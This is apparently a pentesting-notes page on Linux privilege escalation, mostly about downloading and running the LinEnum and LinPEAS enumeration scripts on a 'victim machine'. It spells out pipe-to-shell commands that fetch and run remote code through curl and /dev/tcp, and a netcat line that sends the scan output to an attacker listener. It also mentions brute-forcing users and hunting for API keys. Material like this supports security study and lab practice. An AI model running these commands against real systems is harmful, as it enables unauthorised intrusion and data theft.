🍎Linux Privilege Escalation

Introduction

Privilege escalation is the process of exploiting a vulnerability or weakness in a system or application to gain elevated privileges or access to resources that are normally restricted. In a Linux environment, there are various techniques that can be used to escalate privileges. In this article, we will explore 11 techniques for Linux privilege escalation with examples for each of them.

Linux Enumeration to escalation privileges

Enumeration is a key for every successful attack. It is a critical phase in hacking systems, and a vital part of information gathering. During this phase, we establish a connection between us and the target (locally or remotely) to gather as much information as possible to decide on an attacking vector. To enumerate a Linux host, you can use a very useful utility called LinEnum/ linpeas which could be downloaded from the link below:

LogoGitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation ChecksGitHub
or
LogoPEASS-ng/linPEAS at master · peass-ng/PEASS-ngGitHub

How to Get LinPEAS

There are several ways to download LinPEAS:

  1. From Github:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

  1. Without curl (using python):

python -c "import urllib.request; urllib.request.urlretrieve('https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

  1. Without curl (using python3):

python3 -c "import urllib.request; urllib.request.urlretrieve('https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

How to Run LinPEAS

Locally:

./linpeas.sh

Remote Network:

  • Host as Server:

    1. Run sudo python3 -m http.server 80 on the host to start an HTTP server.

    2. On the victim machine: curl 10.10.10.10/linpeas.sh | sh

  • Victim as Server (requires netcat):

    1. On the victim machine: sudo nc -q 5 -lvnp 80 < linpeas.sh

    2. On the host: cat < /dev/tcp/10.10.10.10/80 | sh

From Memory (requires netcat):

  • Host as Server:

    1. Run nc -lvnp 9002 | tee linpeas.out on the host to capture output.

    2. On the victim machine: curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002

Options

  • -a (all checks except regex): Performs most intensive checks (including brute-forcing users).

  • -r (regex checks): Enables searching for hundreds of API keys. (Takes time)

  • -o (only specific checks): Select specific checks to run (comma-separated list).

  • -P (password): Specify a password for sudo and brute-forcing users.

How to use in few steps:

  1. Download LinEnum or Linpeas from github to your victim machine.

  2. Edit the permissions: chmod +x LinEnum.sh or chmod +x linpeas.sh

  3. Run the script: ./LinEnum.sh or linpeas.sh

Download LinEnum/Linpeas from your attacker machine to victim machine:

  1. Download LinEnum/linpeas.sh from github to your own machine.

  2. Host the file on your machine which will run a local server for you on port 8000 by execeuting the following command: python3 -m http.server

  3. Download the file from our server: wget <attacker ip>:8000/LinEnum.sh or wget <attacker ip>:8000/linpeas.sh

  4. Edit the permissions: chmod +x LinEnum.sh / chmod +x linpeas.sh

  5. Run the script: ./LinEnum.sh / ./linpeas.sh

Analyzing LinPEAS Output for Privilege Escalation

The output generated by LinPEAS can be extensive, but the key is to focus on the sections relevant to privilege escalation. Look for highlighted areas, particularly those indicating potential misconfigurations or vulnerabilities.

Pay attention to sections related to:

  • Sudo Permissions: Check for overly permissive sudo rules that grant unnecessary access to commands.

  • SUID/SGID Binaries: Analyze binaries with the SUID or SGID bit set, especially those owned by root, as they might allow for privilege escalation.

  • Cron Jobs: Examine cron jobs running with root privileges, as misconfigured cron jobs can be hijacked to execute arbitrary commands.

Remember: LinPEAS helps identify potential vulnerabilities; thoroughly investigate any findings and verify their exploitability before drawing conclusions.

Common Privilege Escalation Techniques Identified by LinPEAS

Exploiting Sudo Rights and Misconfigurations

The sudo command in Linux allows a user to execute commands as another user, typically the root. While intended for administrative convenience, misconfigured sudo rights can be an attacker’s goldmine.

Imagine a user account with sudo access to run a specific command, say, vi, meant for editing files. Now, if this sudo permission doesn’t restrict the user from passing arguments to vi, an attacker could use this to execute system commands, potentially leading to a full system takeover.

LinPEAS excels in finding such misconfigurations. It scans the system’s sudoers file, which dictates sudo permissions, and highlights any potentially dangerous configurations.

Leveraging SUID and SGID Binaries

SUID (Set owner User ID) and SGID (Set owner Group ID) are special permissions that allow users to execute a file with the permissions of the file owner or group, respectively. While designed for legitimate purposes, misusing SUID/SGID binaries can be dangerous.

For instance, suppose an attacker finds a SUID binary owned by root that has a vulnerability allowing arbitrary command execution. The attacker can exploit this to gain a root shell, essentially taking full control of the system.

LinPEAS hunts for such binaries. It searches the entire file system for files with the SUID/SGID bit set and flags any potentially dangerous files, especially those owned by root.

Below we will be discussing 11 privilege escalation techniques in details.

1- Exploiting SUID Executables

PreviousExam TipsNextPrivilege Escalation: SUID

Last updated

Was this helpful?